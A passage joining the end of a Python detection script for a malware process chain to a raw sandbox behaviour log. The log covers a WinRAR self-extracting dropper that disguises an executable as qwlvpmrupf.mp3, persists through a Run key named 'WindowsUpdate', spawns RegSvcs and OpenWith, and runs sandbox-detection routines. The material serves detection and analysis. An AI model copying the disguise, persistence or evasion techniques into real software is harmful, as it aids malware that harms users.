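    ProcEvent(1040, 1010, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3'),
    ProcEvent(1050, 1040, r"C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3", "qwlvpmrupf.mp3 tnlupe.mp3"),
    ProcEvent(1060, 1050, r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe", r'"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"'),
    ProcEvent(1070, 1060, r"C:\Windows\SysWOW64\OpenWith.exe", r'"C:\Windows\system32\openwith.exe"'),
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

Each rule fires on a different process of the chain, so a single alert would already carry the whole lineage; R2 deliberately requires a script host among the ancestors, because ipconfig /release and /renew typed by an administrator in a plain cmd.exe session must stay silent.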
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ngPebbPhbp.exe Static file information: File size 1684188 > 1048576
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ngPebbPhbp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00375D78
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6003703
Source: ngPebbPhbp.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26680 push ecx; ret 0_2_00B26693
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B25773 push ecx; ret 0_2_00B25786
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003C0330 push edi; ret 7_2_003C0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390E06 push ecx; ret 7_2_00390E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038DBFE push eax; iretd 7_2_0038DC01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563170 push ecx; iretd 14_2_0556317C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563130 pushad ; ret 14_2_05563138
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_055651E2 push eax; retf 14_2_055651F1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563C62 push es; retf 14_2_05563C91
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563C95 push es; retf 14_2_05563C91
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05561F50 push eax; retf 14_2_05561F51
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05565777 push esi; ret 14_2_05565782
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_055637A2 push ebp; iretd 14_2_055637A3
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05564E69 push ebx; iretd 14_2_05564E6A
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05565A80 push edx; ret 14_2_05565A81
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03284B00 push edx; ret 15_3_03284B01
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282D15 push es; retf 15_3_03282D11
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032821B0 pushad ; ret 15_3_032821B8
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032821F0 push ecx; iretd 15_3_032821FC
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032847F7 push esi; ret 15_3_03284802
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03280FD0 push eax; retf 15_3_03280FD1
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282822 push ebp; iretd 15_3_03282823
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03284262 push eax; retf 15_3_03284271
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03283EE9 push ebx; iretd 15_3_03283EEA
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282CE2 push es; retf 15_3_03282D11
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5FF00 push eax; ret 15_2_05A5FF2E
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DE0332 push edi; ret 16_2_00DE0333
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0E06 push ecx; ret 16_2_00DB0E19
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DADC00 push eax; iretd 16_2_00DADC01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF61A3 push CF1CE871h; iretd 17_2_01BF61AA
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF602F push D090E871h; iretd 17_2_01BF6036

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_004025A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 7_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_0038FC8A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 16_2_00E225A0
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DAFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 16_2_00DAFC8A
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\SysWOW64\OpenWith.exe API/Special instruction interceptor: Address: 7FFE2220D044
Source: C:\Windows\SysWOW64\OpenWith.exe API/Special instruction interceptor: Address: 5A6A83A
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
